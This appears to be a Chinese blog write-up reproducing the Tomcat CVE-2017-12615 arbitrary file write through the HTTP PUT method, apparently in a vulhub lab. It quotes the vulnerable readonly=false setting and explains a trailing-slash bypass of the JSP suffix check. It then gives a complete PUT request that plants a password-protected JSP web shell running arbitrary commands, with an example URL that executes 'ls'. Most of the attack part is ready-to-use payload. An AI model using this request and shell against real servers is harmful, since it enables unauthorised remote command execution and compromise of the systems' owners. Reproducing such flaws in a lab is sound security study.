通过PUT方法的Tomcat任意写入文件漏洞 CVE-2017-12615 漏洞复现

通过PUT方法的Tomcat任意写入文件漏洞(CVE-2017-12615)

by ADummy

0x00利用路线

​ Burpsuite抓包—>发包—>写入shell—>命令执行

0x01漏洞介绍

​ Tomcat设置了写许可权(readonly = false),这导致我们可以将文件写入服务器。


    default
    org.apache.catalina.servlets.DefaultServlet
    
        debug
        0
    
    
        listings
        false
    
    
        readonly
        false
    
    1

尽管Tomcat在某种程度上检查了文件后缀(无法直接编写jsp),但我们仍然可以通过某些文件系统功能(例如/在Linux中使用)来绕过该限制。

0x02漏洞复现

payload
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("
");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("
"); } %>
http://192.168.68.132:8080/1.jsp?pwd=023&i=ls

通过PUT方法的Tomcat任意写入文件漏洞 CVE-2017-12615 漏洞复现_第1张图片
通过PUT方法的Tomcat任意写入文件漏洞 CVE-2017-12615 漏洞复现_第2张图片

0x03参考资料

https://www.cnblogs.com/qianxiao996/p/13574653.html

你可能感兴趣的:(vulhub_Writeup,安全漏洞,渗透测试,网络安全)